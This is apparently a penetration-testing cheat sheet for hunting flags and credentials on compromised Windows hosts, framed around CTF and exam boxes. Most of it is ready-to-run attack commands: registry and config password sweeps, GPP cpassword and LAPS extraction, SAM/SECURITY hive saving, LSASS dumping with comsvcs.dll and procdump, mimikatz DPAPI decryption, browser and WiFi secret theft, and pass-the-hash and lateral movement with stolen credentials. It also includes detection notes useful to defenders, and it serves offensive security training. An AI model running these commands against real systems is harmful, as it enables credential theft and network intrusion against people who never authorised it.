windows-credential-flag-hunting.md (24281B)
1 --- 2 title: "Windows Credential & Flag Hunting" 3 description: "Find flags, passwords and secrets on Windows — CMD vs PowerShell (Evil-WinRM) syntax, config/registry secrets, PS history, and automated tools." 4 category: password-attacks 5 subcategory: "Credential & Flag Hunting" 6 tags: [windows, powershell, evil-winrm, credentials, flags, post-exploitation, dpapi, mimikatz, laps, gpp, lsass] 7 tools: [PowerShell, cmd, Evil-WinRM, WinPEAS, Snaffler, LaZagne, mimikatz, SharpDPAPI, SharpChrome, secretsdump, pypykatz, procdump, netexec] 8 difficulty: intermediate 9 updated: "2026-09-25" 10 source: "repo:Password-Attacks/windows-credential-flag-hunting.md" 11 --- 12 13 # Windows Credential & Flag Hunting 14 15 Post-compromise searching on Windows: find proof flags, then sweep for passwords and secrets. **Which shell you are in decides which syntax works** — this trips people up constantly. 16 17 --- 18 19 ## ⚠️ Read This First — CMD vs PowerShell 20 21 **Evil-WinRM, WinRM, and most modern remote shells drop you into PowerShell, not CMD.** In PowerShell, `dir` and `where` are *aliases* for `Get-ChildItem` and `Where-Object`, so old CMD flags are parsed as arguments and fail: 22 23 ```text 24 *Evil-WinRM* PS C:\> dir /S /B *user*.txt 25 A positional parameter cannot be found that accepts argument '*user*.txt'. 26 *Evil-WinRM* PS C:\> where /R C:\ user.txt 27 A positional parameter cannot be found that accepts argument 'user.txt'. 28 ``` 29 30 `dir /S /B`, `where /R`, and `findstr /SI` are **CMD-only** — they do not work at a PowerShell prompt. Use one of the two fixes below. 31 32 | Task | CMD (cmd.exe only) | PowerShell (Evil-WinRM) | 33 |---|---|---| 34 | Recursive file find | `dir /S /B C:\*user*.txt` | `Get-ChildItem -Path C:\ -Recurse -Filter *user*.txt -ErrorAction SilentlyContinue` | 35 | Find a named file | `where /R C:\ user.txt` | `Get-ChildItem -Path C:\ -Recurse -Filter user.txt -ErrorAction SilentlyContinue` | 36 | Grep file contents | `findstr /S /I /M "password" *.xml` | `Get-ChildItem -Recurse -Filter *.xml \| Select-String password` | 37 38 **Escape hatch — run CMD from PowerShell:** if you insist on the CMD one-liners, wrap them: 39 ```powershell 40 cmd /c "dir /S /B C:\*user*.txt" 41 cmd /c "where /R C:\ user.txt" 42 cmd /c "findstr /S /I /M password C:\*.xml C:\*.ini C:\*.txt" 43 ``` 44 45 > **Note —** `-ErrorAction SilentlyContinue` (short: `-EA 0`) is the PowerShell equivalent of `2>nul` — it hides "Access Denied" noise from directories you cannot read. Without it, a `C:\` recurse is unreadable. 46 47 --- 48 49 ## Phase 1 — Flag Hunting 50 51 ### PowerShell (Evil-WinRM) 52 ```powershell 53 # Standard proof files anywhere on C:\ 54 Get-ChildItem -Path C:\ -Recurse -Include user.txt,root.txt,proof.txt,flag*.txt -ErrorAction SilentlyContinue -Force 55 56 # Usual desktops (most HTB/exam boxes) 57 Get-Content C:\Users\*\Desktop\user.txt -ErrorAction SilentlyContinue 58 Get-Content C:\Users\Administrator\Desktop\root.txt -ErrorAction SilentlyContinue 59 60 # Anything named like a flag, including hidden files (-Force shows hidden/system) 61 Get-ChildItem -Path C:\ -Recurse -Filter *flag* -Force -ErrorAction SilentlyContinue 62 ``` 63 64 ### CMD 65 ```cmd 66 dir /S /B C:\user.txt C:\root.txt 67 where /R C:\ user.txt 68 type C:\Users\Administrator\Desktop\root.txt 69 ``` 70 71 > **Note —** `-Include` needs `-Recurse` (or a wildcard in `-Path`) to take effect. `-Filter` is faster than `-Include` but accepts only one pattern. 72 73 --- 74 75 ## Phase 2 — Finding Files (PowerShell reference) 76 77 ```powershell 78 # By extension across the whole drive 79 Get-ChildItem -Path C:\ -Recurse -Include *.kdbx,*.config,*.xml,*.ini,*.txt -EA 0 80 81 # Alias shorthand: gci = Get-ChildItem 82 gci C:\ -Recurse -Filter *.pem -EA 0 | Select-Object FullName 83 84 # Files changed recently (fresh loot) 85 gci C:\ -Recurse -EA 0 | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-1) } | Select FullName,LastWriteTime 86 87 # Only return the path column, not the full table 88 gci C:\Users -Recurse -Filter *.txt -EA 0 | % { $_.FullName } 89 ``` 90 91 --- 92 93 ## Phase 3 — Grep File Contents (Select-String) 94 95 `Select-String` (alias `sls`) is PowerShell's `grep`/`findstr`: 96 97 ```powershell 98 # Recurse a tree, search common config types for "password" 99 Get-ChildItem -Path C:\ -Recurse -Include *.xml,*.ini,*.txt,*.config,*.ps1,*.bat -EA 0 | 100 Select-String -Pattern 'password|passwd|pwd|secret' -EA 0 101 102 # List only the matching file names (like findstr /M) 103 gci C:\inetpub,C:\xampp -Recurse -Include *.php,*.config -EA 0 | 104 Select-String 'password' -List -EA 0 | Select-Object Path 105 106 # Save results to a file 107 gci C:\ -Recurse -Include *.config,*.xml -EA 0 | 108 Select-String 'password' -EA 0 | Out-File C:\Windows\Temp\results.txt 109 ``` 110 111 ### CMD equivalent (findstr) 112 ```cmd 113 :: /S recurse, /I case-insensitive, /M filenames only, /N line numbers, /P skip binaries 114 findstr /S /I /M "password" C:\*.xml C:\*.ini C:\*.txt C:\*.config 115 findstr /S /I /N "password" C:\*.config 2>nul >> results.txt 116 findstr /S /P /I "password" C:\Users\*.* 117 ``` 118 119 > **Why the original one-liners failed —** `findstr /spin "password" *.*` and `findstr /si password *.xml` only search the **current directory** unless you `cd` first and give real paths, and they are CMD syntax so they error outright in an Evil-WinRM PowerShell prompt. Prefer the `Select-String` versions above. 120 121 --- 122 123 ## Phase 4 — High-Value Locations 124 125 ### Unattended install / provisioning files (classic plaintext creds) 126 ```powershell 127 Get-ChildItem -Path C:\ -Recurse -Include Unattend.xml,Unattended.xml,sysprep.xml,sysprep.inf,Autounattend.xml -EA 0 128 # Common fixed paths: 129 type C:\Windows\Panther\Unattend.xml 2>$null 130 type C:\Windows\System32\Sysprep\sysprep.xml 2>$null 131 # GPP password in SYSVOL (cpassword) — decrypt with gpp-decrypt 132 gci \\<DC>\SYSVOL -Recurse -Include Groups.xml,Services.xml,ScheduledTasks.xml -EA 0 133 ``` 134 135 ### GPP passwords in SYSVOL (`cpassword`) 136 137 Group Policy Preferences stored local-account passwords as `cpassword` in SYSVOL XML, AES-encrypted with a **public** static key — any authenticated domain user can decrypt them. Complements the `\\<DC>\SYSVOL` find above. 138 139 ```powershell 140 # On a domain-joined host (PowerSploit) — auto-finds + decrypts all GPP cpasswords 141 Get-GPPPassword 142 143 # Manual: grep SYSVOL for the encrypted blob 144 findstr /S /I cPassword \\<domain>\SYSVOL\<domain>\Policies\*.xml 145 ``` 146 ```bash 147 # Remote from Linux (no domain join needed) 148 Get-GPPPassword.py '<domain>/<user>:<pass>@<DC>' 149 nxc smb <DC> -u <user> -p '<pass>' -M gpp_password 150 gpp-decrypt '<cpassword_value>' 151 ``` 152 153 > **Note —** MS14-025 blocked *creating* new GPP passwords, but existing ones were never purged. Full walkthrough: /sheets/active-directory/attack-48-gpp-password-decryption 154 155 ### PowerShell & CMD history (very commonly holds passwords) 156 ```powershell 157 # PSReadLine history file — per user, survives reboots 158 Get-Content (Get-PSReadlineOption).HistorySavePath -EA 0 159 type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 160 # Every user's history 161 gci C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA 0 | % { $_.FullName; gc $_.FullName } 162 ``` 163 164 ### Saved / cached credentials 165 ```powershell 166 cmdkey /list # stored credentials (use with runas /savecred) 167 # Web / app config secrets 168 gci C:\inetpub\wwwroot -Recurse -Include web.config,appsettings.json,*.config -EA 0 | Select-String 'password|connectionString' 169 type C:\Windows\System32\inetsrv\config\applicationHost.config 2>$null 170 ``` 171 172 ### Windows Credential Manager & Vault 173 174 `cmdkey /list` (above) shows *targets* but never the secret. To enumerate and decrypt the stored blobs: 175 176 ```powershell 177 # Enumerate stored credentials (targets only — no plaintext returned) 178 vaultcmd /list 179 vaultcmd /listcreds:"Windows Credentials" /all 180 vaultcmd /listcreds:"Web Credentials" /all 181 182 # Web Credentials plaintext for the CURRENT user (WinRT PasswordVault) 183 [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] 184 $v = New-Object Windows.Security.Credentials.PasswordVault 185 $v.RetrieveAll() | % { $_.RetrievePassword(); '{0} {1} {2}' -f $_.Resource,$_.UserName,$_.Password } 186 187 # Third-party module (needs: Install-Module CredentialManager) 188 Get-StoredCredential -Target TERMSRV/<host> 189 (Get-StoredCredential -Target 'git:https://github.com').GetNetworkCredential().Password 190 ``` 191 ```text 192 # Decrypt Credential Manager / Vault blobs via DPAPI (current-user context) 193 SharpDPAPI.exe credentials 194 SharpDPAPI.exe vaults 195 ``` 196 197 > **Note —** `vaultcmd` lists targets only; the passwords are DPAPI-protected under `%APPDATA%\Microsoft\Credentials\` and `%LOCALAPPDATA%\Microsoft\Credentials\`, decryptable only in the owning user's context or with their masterkey (see DPAPI in Phase 5). 198 199 ### WiFi saved keys (`netsh wlan`) 200 201 ```cmd 202 netsh wlan show profiles 203 netsh wlan show profile name="<SSID>" key=clear :: look for the "Key Content" line 204 205 :: Dump every saved profile's PSK in one pass 206 for /f "tokens=2 delims=:" %a in ('netsh wlan show profiles ^| findstr "All User Profile"') do @netsh wlan show profile name="%~a" key=clear ^| findstr /C:"SSID name" /C:"Key Content" 207 ``` 208 ```powershell 209 netsh wlan show profiles | Select-String ':\s(.+)$' | % { 210 $ssid = $_.Matches.Groups[1].Value.Trim() 211 netsh wlan show profile name="$ssid" key=clear | Select-String 'SSID name|Key Content' 212 } 213 ``` 214 215 > **Note —** `key=clear` needs local admin (or the profile's owning user). Without it the PSK shows as `Present` but redacted. 216 217 ### Registry secrets 218 ```powershell 219 # Autologon plaintext password 220 Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select DefaultUserName,DefaultPassword,DefaultDomainName 221 # VNC, PuTTY, SNMP, and installer creds 222 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s 2>$null 223 reg query "HKLM\SOFTWARE\RealVNC\vncserver" /v Password 2>$null 224 reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s 2>$null 225 # Search entire hives for "password" 226 reg query HKLM /f password /t REG_SZ /s 2>$null 227 reg query HKCU /f password /t REG_SZ /s 2>$null 228 ``` 229 230 ### Saved-session managers (PuTTY / WinSCP / RDP) 231 232 ```powershell 233 # PuTTY — the PROXY password is stored in CLEARTEXT in the registry 234 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr /I "HostName UserName ProxyPassword ProxyUsername" 235 236 # WinSCP — sessions in the registry (or WinSCP.ini for portable installs) 237 reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s 238 type "$env:APPDATA\WinSCP.ini" 2>$null # portable installs; installed WinSCP keeps sessions in the registry (above) 239 ``` 240 ```text 241 # WinSCP OBFUSCATES (does not encrypt) the password unless a master password is set — 242 # feed HostName + UserName + the stored Password to a public decoder: 243 # msf6 > use post/windows/gather/credentials/winscp # against a live host 244 ``` 245 246 > **Note —** `.rdp` files (grabbed in the keys/vaults sweep) hold the server + username only; the RDP password is a DPAPI blob in Credential Manager (`cmdkey`), not in the file. A WinSCP session protected with a **master password** cannot be trivially decoded — capture it interactively instead. 247 248 ### Keys, vaults, and databases 249 ```powershell 250 gci C:\ -Recurse -Include *.kdbx,*.ppk,*.pem,id_rsa -EA 0 # KeePass / PuTTY / SSH keys 251 gci C:\Users -Recurse -Include *.rdp -EA 0 # saved RDP profiles 252 gci $env:USERPROFILE\.aws\credentials,$env:USERPROFILE\.ssh\* -EA 0 253 ``` 254 255 **Finding KeePass vaults — CMD** 256 ```cmd 257 dir /s /b C:\*.kdbx 258 where /r C:\ *.kdbx 259 dir /s /b %USERPROFILE%\*.kdbx 260 ``` 261 262 **Finding KeePass vaults — PowerShell** 263 ```powershell 264 Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -EA 0 265 Get-ChildItem -Path C:\Users -Include *.kdbx,*.kdb -File -Recurse -EA 0 | 266 Select-Object FullName, LastWriteTime 267 268 # KeePass config often leaks the key-file path or an auto-open DB path 269 Get-ChildItem -Path C:\Users -Include KeePass.config.xml -File -Recurse -EA 0 270 ``` 271 272 **Related artifacts worth grabbing alongside the `.kdbx`** 273 - `KeePass.config.xml` — may reference a key-file path or an auto-open DB 274 - `*.key` files near the vault — possible key-file auth component 275 - Live `KeePass.exe` process — memory can be scraped for the unlocked DB (e.g. `KeePassDumpFull`, or a mimikatz-style memory dump) 276 - `%APPDATA%\Microsoft\Windows\Recent\` — shortcuts (`.lnk`) that reference a `.kdbx` path even if the vault itself has moved 277 278 **Offline cracking** 279 ```bash 280 keepass2john vault.kdbx > hash.txt 281 john hash.txt 282 # or: hashcat -m 13400 hash.txt wordlist.txt 283 ``` 284 285 ### LAPS — read managed local-admin password 286 287 If your foothold user can read the LAPS attribute (ACL or delegated group), the managed local-admin password sits in cleartext in AD (`ms-Mcs-AdmPwd` for v1; `msLAPS-Password` / `msLAPS-EncryptedPassword` for v2). 288 289 ```powershell 290 # Native RSAT / LAPS module 291 Get-ADComputer <TARGET> -Properties ms-Mcs-AdmPwd | Select Name,ms-Mcs-AdmPwd 292 Get-LapsADPassword -Identity <TARGET> -AsPlainText # LAPS v2 module 293 294 # PowerView 295 Get-DomainComputer <TARGET> -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime 296 ``` 297 ```bash 298 # NetExec 299 nxc ldap <DC> -u <user> -p '<pass>' --module laps 300 nxc smb <DC> -u <user> -p '<pass>' --laps 301 # ldapsearch 302 ldapsearch -x -H ldap://<DC> -D '<user>@<domain>' -w '<pass>' \ 303 -b 'DC=<dc>,DC=<tld>' '(ms-Mcs-AdmPwd=*)' ms-Mcs-AdmPwd 304 ``` 305 306 > **Note —** LAPS v2 encrypts the password blob (`msLAPS-EncryptedPassword`) — decrypt with `Get-LapsADPassword` or NetExec. Full technique: /sheets/active-directory/attack-72-laps-password-extraction 307 308 --- 309 310 ## Phase 5 — SAM / LSASS / DPAPI (local admin required) 311 312 ```cmd 313 :: Dump the local SAM + SYSTEM hives, then crack/pass-the-hash offline 314 reg save HKLM\SAM C:\Windows\Temp\sam.save 315 reg save HKLM\SYSTEM C:\Windows\Temp\system.save 316 :: Exfil, then: impacket-secretsdump -sam sam.save -system system.save LOCAL 317 ``` 318 319 ```powershell 320 # LSASS memory dump for mimikatz (Task Manager > lsass > Create dump, or): 321 rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full 322 # Then offline: pypykatz lsa minidump lsass.dmp 323 ``` 324 325 > **Note —** These need local Administrator / SeDebugPrivilege and are noisy (Defender flags LSASS access). For a stealthier route dump remotely with `nxc smb <host> -u u -p p --sam --lsa`. 326 327 ### Full hive triage (SAM + SYSTEM + SECURITY) 328 329 Grab the **SECURITY** hive alongside SAM + SYSTEM — it holds LSA secrets (service-account plaintext, DPAPI machine key, `$MACHINE.ACC`) and cached domain logons (MSCACHEv2 / DCC2). 330 331 ```cmd 332 reg save HKLM\SAM C:\Windows\Temp\sam.save 333 reg save HKLM\SYSTEM C:\Windows\Temp\system.save 334 reg save HKLM\SECURITY C:\Windows\Temp\security.save 335 ``` 336 ```bash 337 # Offline — local SAM hashes + LSA secrets + cached DCC2 hashes 338 impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL 339 # Cached domain creds crack as: hashcat -m 2100 '$DCC2$...' wordlist 340 ``` 341 342 > **Note —** LSA secrets frequently contain service-account **cleartext** passwords (`_SC_<svc>`, `DefaultPassword`); cached logons (`NL$KM` -> DCC2) only crack offline and are slow (`-m 2100`), never pass-the-hash. 343 344 ### LSASS dump alternatives & DPAPI / browser secrets 345 346 ```cmd 347 :: procdump (Sysinternals, signed) — alternative to the comsvcs.dll MiniDump above 348 procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp 349 :: dump by PID if the process name is filtered 350 procdump64.exe -accepteula -ma <lsass_pid> C:\Windows\Temp\lsass.dmp 351 ``` 352 ```text 353 # Parse the dump offline 354 pypykatz lsa minidump C:\Windows\Temp\lsass.dmp 355 356 # DPAPI masterkeys -> decrypt Credential Manager / Vault / browser blobs (mimikatz) 357 privilege::debug 358 sekurlsa::dpapi # cached masterkeys straight from LSASS 359 dpapi::masterkey /in:%APPDATA%\Microsoft\Protect\<SID>\<GUID> /sid:<SID> /password:<userpw> 360 dpapi::masterkey /in:<masterkey> /rpc # or decrypt via the DA domain backup key 361 dpapi::cred /in:%APPDATA%\Microsoft\Credentials\<GUID> 362 363 # SharpDPAPI — one-shot triage of the current user's DPAPI-protected secrets 364 SharpDPAPI.exe triage 365 SharpDPAPI.exe backupkey /nowrap # on a DC as Domain Admin -> domain DPAPI key 366 367 # Browser saved logins / cookies (Chrome + Chromium Edge) 368 SharpChrome.exe logins 369 SharpChrome.exe cookies 370 lazagne.exe browsers 371 ``` 372 373 > **Note —** Chrome/Edge **127+** wrap the `Local State` AES key with App-Bound Encryption; offline SharpChrome/LaZagne may return empty for newer profiles — run in the victim's session or use an ABE-aware tool. Browser DBs live at `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data` plus `...\Local State`. 374 375 > **Note —** DPAPI + certificate theft in depth: /sheets/active-directory/theft2-user-certificate-theft-via-dpapi and /sheets/active-directory/mimikatz 376 377 --- 378 379 ## Phase 6 — Automated Tools 380 381 | Tool | Run from | Command | 382 |---|---|---| 383 | **WinPEAS** | any shell | `.\winPEASx64.exe` (or `winPEAS.bat` in CMD) | 384 | **Snaffler** | domain host | `.\Snaffler.exe -s -o snaffler.log` — sweeps shares for creds | 385 | **LaZagne** | any shell | `.\lazagne.exe all` — browsers, wifi, RDP, DB creds | 386 | **SharpChrome/SharpDPAPI** | .NET | dump browser + DPAPI secrets | 387 | **PowerUp** | PowerShell | `. .\PowerUp.ps1; Invoke-AllChecks` | 388 | **seatbelt** | .NET | `.\Seatbelt.exe -group=all` | 389 390 ```powershell 391 # Evil-WinRM: upload a tool then run it 392 # (from the Evil-WinRM prompt) upload winPEASx64.exe 393 .\winPEASx64.exe quiet cmd fast 394 ``` 395 396 --- 397 398 ## Phase 7 — Using a Found Password (run a session as another user) 399 400 Once you've recovered a username + password, spawn a shell running as that user instead of just verifying the cred worked. 401 402 ### CMD — `runas` 403 ```cmd 404 :: Prompts for the password interactively 405 runas /user:DOMAIN\targetuser cmd 406 407 :: Local (non-domain) account 408 runas /user:targetuser cmd 409 410 :: /netonly — use when the account is only valid on a REMOTE box (no local 411 :: logon rights here); local commands still run as YOU, but anything that 412 :: hits the network authenticates as targetuser. Avoids a failed local logon. 413 runas /netonly /user:DOMAIN\targetuser cmd 414 415 :: Reuse a credential CMD already cached (see `cmdkey /list` above) 416 runas /savecred /user:DOMAIN\targetuser cmd 417 ``` 418 419 ### PowerShell — build a credential object 420 ```powershell 421 # Prompts for the password securely (or build SecureString from a known plaintext) 422 $cred = Get-Credential DOMAIN\targetuser 423 # Non-interactive, from a known plaintext (lab/CTF use): 424 $pass = ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force 425 $cred = New-Object System.Management.Automation.PSCredential('DOMAIN\targetuser', $pass) 426 427 # New process as that user (own console window) 428 Start-Process powershell -Credential $cred 429 430 # Interactive shell in the CURRENT console (no new window) 431 $si = New-Object System.Diagnostics.ProcessStartInfo 432 $si.FileName = 'powershell.exe' 433 $si.UserName = 'targetuser'; $si.Domain = 'DOMAIN' 434 $si.Password = $pass 435 $si.UseShellExecute = $false # REQUIRED — Start() throws if this is left $true with explicit creds 436 [System.Diagnostics.Process]::Start($si) 437 438 # Remote session / lateral movement as that user (WinRM must be enabled on target) 439 Enter-PSSession -ComputerName TARGET -Credential $cred 440 $s = New-PSSession -ComputerName TARGET -Credential $cred 441 Invoke-Command -Session $s -ScriptBlock { whoami } 442 443 # Run one command as the user without a full session 444 Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami /all } 445 ``` 446 447 > **Note —** `runas` and `Start-Process -Credential` need the password (or hash via `/netonly` + `mimikatz sekurlsa::pth`); they don't accept an NTLM hash directly. For hash-only creds, pass-the-hash instead: `impacket-psexec`, `impacket-wmiexec`, or `evil-winrm -i TARGET -u user -H <NTLMhash>`. 448 449 --- 450 451 ## Quick Wins Checklist 452 453 - [ ] `Get-Content (Get-PSReadlineOption).HistorySavePath` — PS history 454 - [ ] `cmdkey /list` — saved credentials for `runas /savecred` 455 - [ ] `Unattend.xml` / `sysprep.xml` / `Autounattend.xml` 456 - [ ] Winlogon `DefaultPassword` autologon 457 - [ ] `web.config` / `appsettings.json` connection strings 458 - [ ] SYSVOL `Groups.xml` GPP `cpassword` (→ `gpp-decrypt`) 459 - [ ] `.kdbx` KeePass, `.ppk`/`id_rsa` keys, `.rdp` profiles 460 - [ ] `reg query HKLM /f password /t REG_SZ /s` 461 - [ ] `vaultcmd /list` + `SharpDPAPI.exe credentials` — Credential Manager / Vault secrets 462 - [ ] `netsh wlan show profile name="<SSID>" key=clear` — saved WiFi PSKs 463 - [ ] LAPS `ms-Mcs-AdmPwd` read (RSAT / PowerView / `nxc --laps`) 464 - [ ] SECURITY hive -> LSA secrets + cached domain creds (`secretsdump … -security`) 465 - [ ] `SharpChrome.exe logins` / `lazagne.exe browsers` — browser saved logins 466 - [ ] PuTTY `ProxyPassword` (cleartext) / WinSCP saved sessions 467 468 --- 469 470 ## Troubleshooting 471 472 | Problem | Cause & fix | 473 |---------|-------------| 474 | `Get-ChildItem -Recurse C:\` throws access-denied noise | Add `-ErrorAction SilentlyContinue`; the walk still returns everything you can read | 475 | `Select-String` is painfully slow across `C:\` | Constrain it: `-Include *.config,*.xml,*.ps1,*.txt,*.ini` and start from `C:\Users`, `C:\inetpub`, `C:\ProgramData` rather than the drive root | 476 | `reg query` returns "access denied" on a hive | You need higher rights, or the key is redirected under WOW6432Node — check both `HKLM\SOFTWARE\...` and `HKLM\SOFTWARE\WOW6432Node\...` | 477 | `findstr /s /i password *` finds nothing on a box you know has creds | `findstr` skips files it cannot open silently; re-run the same sweep from PowerShell `Select-String`, which reports the errors | 478 | Reading SAM/SECURITY/SYSTEM hives fails while running as admin | The live hives are locked. Copy them from a Volume Shadow Copy, or read them remotely rather than from the live filesystem | 479 | A recovered hash will not crack | Confirm the format first — NTLM is `-m 1000`, NetNTLMv2 is `-m 5600`, DCC2/`mscash2` is `-m 2100`. A mislabelled mode looks like a wrong password | 480 | `cmdkey /list` shows entries but you cannot read the secret | `cmdkey` never reveals stored secrets. Use them in place with `runas /savecred`, or extract via DPAPI as the owning user | 481 | PowerShell history file is empty | `Get-Content (Get-PSReadlineOption).HistorySavePath` — PSReadline logs to `ConsoleHost_history.txt` under `AppData`, per user, and survives logoff | 482 483 ## Detection & OPSEC 484 485 - **Recursive `Get-ChildItem` / `Select-String` over `C:\`** is high-volume file access and is exactly what EDR file-telemetry rules watch for. Scope to the paths that pay off (`C:\Users\*`, `C:\inetpub`, `C:\ProgramData`, `C:\Windows\Panther`). 486 - **Touching `\Panther\Unattend.xml`, GPP `Groups.xml` on SYSVOL, and the credential vault** maps to MITRE **T1552** (*Unsecured Credentials*). Defenders with SACLs on those paths get an event per read. 487 - **PowerShell is logged.** Script Block Logging (Event ID **4104**) and transcription capture your one-liners verbatim. `cmd.exe` `findstr` is quieter but still lands in process-creation logs (**4688**) with the full command line if command-line auditing is on. 488 - **Copying a hive or keystore off-box is louder than reading it in place** — file-write plus network egress. Extract what you need and pull the smallest artifact. 489 - **`runas /savecred` reuses stored credentials** and generates a logon event (**4624**, logon type 2/9) under the target account; expect it to correlate against your source host. 490 491 ## Related 492 493 * **[Linux Credential & Flag Hunting](/sheets/password-attacks/linux-credential-flag-hunting)** — same job on Linux 494 * **Kerberoasting** / **AS-REP Roasting** — turn a domain foothold into crackable hashes 495 * **[Hashcat](/sheets/password-attacks/hashcat)** — crack recovered hashes (`-m 1000` NTLM, `-m 5600` NetNTLMv2) 496 * **Windows Privilege Escalation** — /sheets/privilege-escalation/windows-privesc 497 * **Mimikatz** — /sheets/active-directory/mimikatz — DPAPI, LSASS and vault extraction 498 * **LAPS password extraction** — /sheets/active-directory/attack-72-laps-password-extraction 499 * **GPP password decryption** — /sheets/active-directory/attack-48-gpp-password-decryption 500 * **DPAPI certificate theft** — /sheets/active-directory/theft2-user-certificate-theft-via-dpapi 501 * **NetExec** — /sheets/active-directory/netexec — remote `--sam` / `--lsa` / `--laps` dumping 502 * **Run as another user from Evil-WinRM** — /sheets/active-directory/run-as-another-user-from-evil-winrm